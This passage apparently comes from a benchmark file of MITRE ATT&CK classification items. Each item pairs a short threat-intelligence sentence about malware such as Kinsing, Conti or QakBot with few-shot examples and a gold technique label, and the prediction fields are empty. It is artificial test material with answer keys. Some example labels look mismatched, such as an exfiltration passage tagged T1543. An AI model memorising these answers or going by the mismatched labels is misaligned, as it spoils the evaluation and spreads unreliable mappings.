MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1546.005\n- Text: actors used the following command following exploitation of a machine with malware to display network connections: netstat -ano >> %temp%\\download\n\t - T1049: System Network Connections Discovery\n- Text: Penquin can execute remote commands using bash scripts.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "Kinsing has used a script to parse files like \"/etc/hosts\" and SSH \"known_hosts\" to discover remote systems.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The attackers also used a malicious tool that they named BCS-server. This tool allows them to open a tunnel into an internal network and then this tunnel can be used to send and receive data between the C&C server and even non-infected computers in the network. The main idea of this tool is based on the same principles as the XTUNNEL malware used by the Sednit group\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: obfuscates files or information to help evade defensive measures.\n\t - T1027: Obfuscated Files or Information\n- Text: APT12 has used the RIPTIDE RAT, which communicates over HTTP with a payload encrypted with RC4.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Conti has decrypted its payload using a hardcoded AES-256 key.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: HAWKBALL has encrypted data with XOR before sending it over the C2 channel.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: BackdoorDiplomacy has copied files of interest to the main drive's recycle bin.\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.", + "gold": "- T1560.002: Archive Collected Data - Archive via Library", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on\n\t - T1112: Modify Registry\n- Text: In addition, web traffic between a service provider\u2019s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily\n\t - T1543: Create or Modify System Process\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory.\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "QakBot can store its configuration information in a randomly named subkey under \"HKCU\\Software\\Microsoft\".", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Usually, after infection the bot sends a \u2018PING\u2019 message, \u2018SYSTEM INFO\u2019 message and \u2018ASK for COMMAND\u2019 message, and the C2 replies with \u2018ACK\u2019 and \u2018COMMAND\u2019 messages. If additional modules were pushed by the C2, the bot sends a \u2018STOLEN INFO\u2019 message containing data stolen by the modules\n\t - T1041: Exfiltration Over C2 Channel\n- Text: The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not \u2018127.0.0.1\u2019. Both of these methods are also present in the latest Team9 backdoor variants\n\t - T1008: Fallback Channels\n- Text: FunnyDream can communicate with C2 over TCP and UDP.\n\t - T1095: Non-Application Layer Protocol\n", + "input": "NETEAGLE can send process listings over the C2 channel.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps://s3[.]amazonaws[.]com/doclibrarysales/test[.]txt and then executes it\n\t - T1583.006: Acquire Infrastructure - Web Services\n\t - T1102: Web Service\n- Text: BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware.\n\t - T1104: Multi-Stage Channels\n", + "input": "Sharpshooter's first-stage downloader was a VBA macro.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A typical response from the C2 server is a legitimate-looking webpage containing the string \u201c!DOCTYPE html\u201d, which the malware checks. The malware then locates a Base64-encoded blob, which it decodes and proceeds to load as a shellcode\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: APT33 has used a variety of publicly available tools like Gpppassword to gather credentials.\n\t - T1552.006: Unsecured Credentials - Group Policy Preferences\n- Text: Cuba loaded the payload into memory using PowerShell.\n\t - T1620: Reflective Code Loading\n", + "input": "FYAnti has the ability to decrypt an embedded .NET module.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uid= and writes a JSS Loader binary to %TEMP%\\PaintHelper.exe. JSS Loader, which has both .NET and C++ versions, has multiple capabilities, including the ability to load additional executables, PowerShell (PS) and JavaScript (JS) files\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1105: Ingress Tool Transfer\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: POWERSOURCE is a PowerShell backdoor.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: ZIRCONIUM has used Python-based implants to interact with compromised hosts.\n\t - T1059.006: Command and Scripting Interpreter - Python\n", + "input": "GRIFFON is written in and executed as JavaScript.", + "gold": "- T1059.007: Command and Scripting Interpreter - JavaScript", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AppleSeed can collect data on a compromised host.\n\t - T1005: Data from Local System\n- Text: SLOWDRIFT downloads additional payloads.\n\t - T1105: Ingress Tool Transfer\n- Text: has a tool that exfiltrates data over the C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "OSX_OCEANLOTUS.D has the ability to upload files from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Chrommme can encrypt and store on disk collected data before exfiltration.\n\t - T1560: Archive Collected Data\n", + "input": "Denis compressed collected data using zlib.", + "gold": "- T1560.002: Archive Collected Data - Archive via Library", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a \u201cTelegram Downloads\u201d folder on an unnamed victim\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: MuddyWater has distributed URLs in phishing e-mails that link to lure documents.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Spearphishing Attachment (ATT&CK T1193) is one of the most used Initial Access techniques used by ransomware families as in Sodinokibi. Attackers use spam emails with an attached MS Office Word document including a malicious macro to download the ransomware to the target system. In order to show the lifecycle of Sodinokibi ransomware, we analyzed a Microsoft Word document. Sodinokibi is a \u201cRansomware-as-a-Service (RAAS) malware, so its distribution methods vary depending on the attacker distributing it\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Kerrdown has been distributed via e-mails containing a malicious link.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT37 has used Python scripts to execute payloads.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.\n\t - T1119: Automated Collection\n- Text: A module in Prikormka gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "Kimsuky has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collect email data.", + "gold": "- T1059.006: Command and Scripting Interpreter - Python", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash: c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168), and internally named taskhostw.exe by its developers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is consistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the persistence of SUNSPOT by creating a scheduled task set to execute when the host boots\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: FatDuke can get user agent strings for the default browser from \"HKCU\\Software\\Classes\\http\\shell\\open\\command\".\n\t - T1012: Query Registry\n- Text: SynAck can manipulate Registry keys.\n\t - T1112: Modify Registry\n", + "input": "Ixeshe has used registry values and file names associated with Adobe software, such as AcroRd32.exe.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts\n\t - T1021.005: Remote Services - VNC\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1021.004: Remote Services - SSH\n- Text: Once the user enters the targeted website, the attacker is notified and can take over the device remotely. As the victim accesses their online banking account, the attacker can display full-screen overlay images (hence the name \u201cremote overlay\u201d) designed to appear like they are part of the bank\u2019s website. These pages can either block the victim\u2019s access to the site, allowing the attacker to move money after initial authentication, or include additional data fields that the user is prompted to fill out\n\t - T1185: Browser Session Hijacking\n- Text: RTM has the capability to download a VNC module from command and control (C2).\n\t - T1219: Remote Access Software\n", + "input": "TrickBot has used a VNC module to monitor the victim and collect information to pivot to valuable systems on the network", + "gold": "- T1021.005: Remote Services - VNC", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Astaroth uses the LoadLibraryExW() function to load additional modules.\n\t - T1129: Shared Modules\n- Text: Egregor has used DLL side-loading to execute its payload.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: Downdelph uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", + "input": "DarkWatchman can load DLLs.", + "gold": "- T1129: Shared Modules", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AnyDesk has been the most common legitimate desktop software used to establish an interactive command and control channel, with ConnectWise seen slightly less frequently.\n\t - T1219: Remote Access Software\n\t - T1219: Remote Access Software\n- Text: MoonWind can execute commands via an interactive command shell. MoonWind uses batch scripts for various purposes, including to restart and uninstall itself.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: UNC2452 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.\n\t - T1568: Dynamic Resolution\n", + "input": "During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and browse the victim file system.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Remsec can obtain a list of users.\n\t - T1087.001: Account Discovery - Local Account\n- Text: MarkiRAT can gather information from the Keepass password manager.\n\t - T1555.005: Credentials from Password Stores - Password Managers\n- Text: InvisiMole can enumerate Registry values, keys, and data.\n\t - T1012: Query Registry\n", + "input": "Fox Kitten has accessed ntuser.dat and UserClass.dat on compromised hosts.", + "gold": "- T1087.001: Account Discovery - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ProLock can use vssadmin.exe to remove volume shadow copies.\n\t - T1490: Inhibit System Recovery\n- Text: POWRUNER may also receive batch commands from the C2 server to collect host information from the system\n\t - T1083: File and Directory Discovery\n\t - T1057: Process Discovery\n\t - T1047: Windows Management Instrumentation\n\t - T1049: System Network Connections Discovery\n\t - T1016: System Network Configuration Discovery\n\t - T1082: System Information Discovery\n\t - T1033: System Owner/User Discovery\n- Text: SILENTTRINITY can remove artifacts from the compromised host, including created Registry keys.\n\t - T1070: Indicator Removal\n", + "input": "FIVEHANDS has the ability to delete volume shadow copies on compromised hosts.", + "gold": "- T1490: Inhibit System Recovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CHOPSTICK provides access to the Windows Registry, which can be used to gather information.\n\t - T1012: Query Registry\n- Text: It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions\n\t - T1485: Data Destruction\n- Text: It\u2019s clear from our research that the quality of the WannaCry code is poor and the developers made many mistakes, enabling many of those infected to recover encrypted data.\u00a0 The way the attackers handled ransom payments limited their ability to capitalise on the spread of the worm.\u00a0 Multiple attempts were made to track transactions to the bitcoin wallets used by the attackers.\u00a0 Although estimates of how much money the attackers made vary, they run into tens of thousands, rather than hundreds .\n\t - T1486: Data Encrypted for Impact\n", + "input": "REvil can query the Registry to get random file extensions to append to encrypted files.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Security Intelligence . Topics . Tricks of the Trade: A Deeper Look Into TrickBot\u2019s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim\u2019s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker\u2019s server, not in a file on the victim\u2019s endpoint. 7) Finally, TrickBot\u2019s financial module replaces the original response that would normally come from the bank with the C2\u2019s response, and the injected page is displayed on the victim\u2019s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot\u2019s Server Side Web-Injects \u2014 Top Level Flow. Figure 5: TrickBot and Dyre both use \u201csourcelink\u201d and \u201csourcequery\u201d for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters\n\t - T1185: Browser Session Hijacking\n- Text: UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note\n\t - T1204.001: User Execution - Malicious Link\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: installs a root certificate to aid in man-in-the-middle actions.\n\t - T1553.004: Subvert Trust Controls - Install Root Certificate\n", + "input": "IcedID has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials. IcedID can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.", + "gold": "- T1185: Browser Session Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gallmaker sent emails with malicious Microsoft Office documents attached.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Kimsuky has sent internal spearphishing emails for lateral movement after stealing victim information.\n\t - T1534: Internal Spearphishing\n- Text: APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n", + "input": "Trojan.Karagany can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.", + "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 has collected files from network shared drives.\n\t - T1039: Data from Network Shared Drive\n- Text: SDBbot has the ability to access the file system on a compromised host.\n\t - T1005: Data from Local System\n- Text: This thread searches for for files with the following extensions on removable drives and copies them to \u2018c:\\system\u2019 every 5 seconds\n\t - T1005: Data from Local System\n\t - T1083: File and Directory Discovery\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1119: Automated Collection\n\t - T1025: Data from Removable Media\n", + "input": "When it first starts, BADNEWS crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GALLIUM ensured each payload had a unique hash, including by using different types of packers.\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- Text: HAWKBALL has methods to check if the process the malware uses is being debugged.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: The domain names differed but the script adheres to the same logic (including the logic function).\u201d The DNSMessenger malware is an obfuscated and customized version of the popular DNS_TXT_PWNAGE.ps1 script available on GitHub and is also referred to by FireEye as POWERSOURCE\n\t - T1027: Obfuscated Files or Information\n", + "input": "Operation Wocao has edited variable names within the Impacket suite to avoid automated detection.", + "gold": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: runs the net view /domain and net view commands.\n\t - T1018: Remote System Discovery\n- Text: WellMess can identify domain group membership for the current user.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: Once on the network, the attackers engaged in network reconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following commands\n\t - T1482: Domain Trust Discovery\n", + "input": "UNC2452 used AdFind to enumerate remote systems.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 